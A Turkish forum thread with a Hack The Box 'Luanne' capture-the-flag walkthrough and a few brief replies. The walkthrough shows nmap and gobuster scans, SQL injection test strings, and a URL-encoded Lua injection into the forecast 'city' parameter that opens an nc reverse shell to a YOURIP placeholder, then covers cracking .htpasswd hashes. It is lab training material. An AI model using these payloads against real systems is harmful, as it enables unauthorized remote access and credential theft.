THT DUYURU

 
 
Capture The Flag Vulnerable VM Walkthrough & Capture The Flag (CTF) Writeup Yazabileceğiniz Bölüm

Seçenekler

Hackthebox - Luanne Walkthrough

cybersoz - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
08/2019
Mesajlar:
17
Konular:
4
Teşekkür (Etti):
12
Teşekkür (Aldı):
6
Ticaret:
(0) %
4
940
18-01-2021 16:24
#1
Makine Adı: Luanne
Zorluk: Kolay
OS: Linux
Link:https://www.hackthebox.eu/home/machines/profile/302

NOT:hackthebox üzerinden verilen ipleri /etc/hosts dizinine kaydedildiği varsayılarak yazılmıştır.

-NMAP TARAMASI-

Kod:
sudo nmap -vv -A luanne.htb


kodu ile taramamızı başaltıyoruzhttps://www.hackthebox.eu/home/machines/profile/302


nmap çıktısı aşağıdaki fotoğraftaki gibidir.





her zamanki gibi sadeceshh ve http portlarının açık olduğunu görüyoruz.

http portunda ne olduğu görebilmek için tarayıcımıza "luanne.htb" yazarak sayfayı açmayı deniyoruz





karşımıza bir login formu geliyor.
böyle bir durumda yapabileceğimiz bir kaç şey bulunmakta


1. SQL injection denemek
2.Bruteforce ile şifreyi kırmayı denemek
3. Başka yöntemler denemek




1. SQL injection denemek

kullanıcı adı ve şifre bölümlerine


" or ""="


105 OR 1=1


gibi sqlinjection'ı tetikleyen metinleri girerek giriş yapmayı deniyoruz Bu metinleri internet üzerinden "SQL Injection codes" yazarak ulaşabilirsiniz (En altta örnek link bırakacağım)




her denediğimiz şifre için "401 Unauthorized" hatasını alıyoruz. Kısaca sitenin sql injection açığı olmadığını anlıyoruz.





2. Brute Force ile şifreyi kırmak


bu şekilde bir işlem günlerce belki aylarca zaman alacağı için direk bu işlemi atlıyorum.


3. Başka Yöntemler Denemek


hemen hemen her sitede bulunan robots.txt dosyasına bakıyoruz





robots.txt dosyasına göre /weather diye bir dizin var fakat 404 erişim hatası veriyor. Biz yine de bu dizine giriyoruz. fakat sonuç aynı






altdizinleri öğrenmek için kullanılan araçlardan biri de gobusterdır. Gobuster içerisinde wordlistleri yüklü olarak gelen altdizinlerin keşfi için kullanılan bruteforce(deneme yanılma yoluyla altdizinleri keşfettiği için bu şekilde dedim) aracıdır. Altdizin taraması aşağıda veridiğim kod ile taramayı başlatıyoruz


Kod:
gobuster dir -u http://luanne.htb/weather -w /usr/share/wordlists/dirb/big.txt -x .php, .txt -e






/weather dizininin altında /forecast isimli bir dizin/dosya daha bulduk.


http://luanne.htb/weather/forecast şeklinde giriş yapıyoruz.


karşımıza bir veritabanı (json) yönetim sayfası cıkıyor





bu sayfa url'i üzerinden backdoor çalıştırıyoruz.


Kod:
%27%29%3Bos.execute%28%22rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20YOURIP%20YOURPORT%20%3E%2Ftmp%2Ff%22%29--

(url encoded hali)
yukardaki backdoor kodunu




http://luanne.htb/weather/forecast?city=London'ın ynaına yağıştırıyoruz son link bu şekilde olacak



Kod:
http://luanne.htb/weather/forecast?city=London%27%29%3Bos.execute%28%22rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20YOURIP%20YOURPORT%20%3E%2Ftmp%2Ff%22%29--



bu sırada terminalimizden
Kod:
nc -lvnp 1234

kodu ile bilgisayarımızı dinlemeye alıyoruz.



buradaki .htpasswd dizinin okuyarak kullanıcı adını ve şifreyi elde ediyoruz fakat şifre encrpyt edildiği için decrpyt etmemiz gerekiyor





ve şifreyi bu şekilde buluyoruz.
içerde biraz gezindikten sonra bir .htpasswd dizinini görüyoruz ve bunun da şifresini kırıyoruz.








arından erişip sağlayıp root ve user flaglerini hackthebox'a gönderiyoruz.


SQL Injection link = https://www.w3schools.com/sql/sql_injection.asp






devilhack01, ber0l Teşekkür etti.
Farkitto - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
01/2021
Nereden:
İstanbul
Mesajlar:
3
Konular:
1
Teşekkür (Etti):
1
Teşekkür (Aldı):
1
Ticaret:
(0) %
18-01-2021 16:33
#2
Fena bişey olmuş Ama Herkesin bu forumu görmemesi üzdü amaan herneyse başarılar.
Konu Farkitto tarafından (18-01-2021 16:35 Saat 16:35 ) değiştirilmiştir.
cybersoz Teşekkür etti.
Qcod3r - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2021
Nereden:
L I N U X
Mesajlar:
75
Konular:
7
Teşekkür (Etti):
15
Teşekkür (Aldı):
40
Ticaret:
(0) %
28-01-2021 18:17
#3
Eline emeğine sağlık.
---------------------
Benim alanım şu anda phishing diyebilirim.
Bu alandan ne zaman çıkacağımı sorarsanız:
Ben çıkmayacağım o beni atacak su ile taşmış bir bardak misali.
The Serum - ait Kullanıcı Resmi (Avatar)
Anka Underground (Çaylak)
Üyelik tarihi:
01/2018
Nereden:
/etc/shadow
Mesajlar:
104
Konular:
17
Teşekkür (Etti):
30
Teşekkür (Aldı):
42
Ticaret:
(0) %
28-01-2021 19:25
#4
Güzel bir çalışma olmuş. Fakat bazı görseller ve kodlar bende görünmüyor benden kaynaklı yüksek ihtimal eline sağlık tekrardan
---------------------
No System Is Safe
Twitter: @tserumtht
Ghost Killer - ait Kullanıcı Resmi (Avatar)
Anka Red Team Junior
Üyelik tarihi:
01/2019
Nereden:
Mesajlar:
4.374
Konular:
137
Teşekkür (Etti):
114
Teşekkür (Aldı):
2295
Ticaret:
(0) %
28-01-2021 20:04
#5
eline sağlık dostum.
--------------------- Aşk güzeldir karşılığı varsa ama karşılıksız da sevilir karşımdaki vatansa...

#Ghost Killer#
cybersoz Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler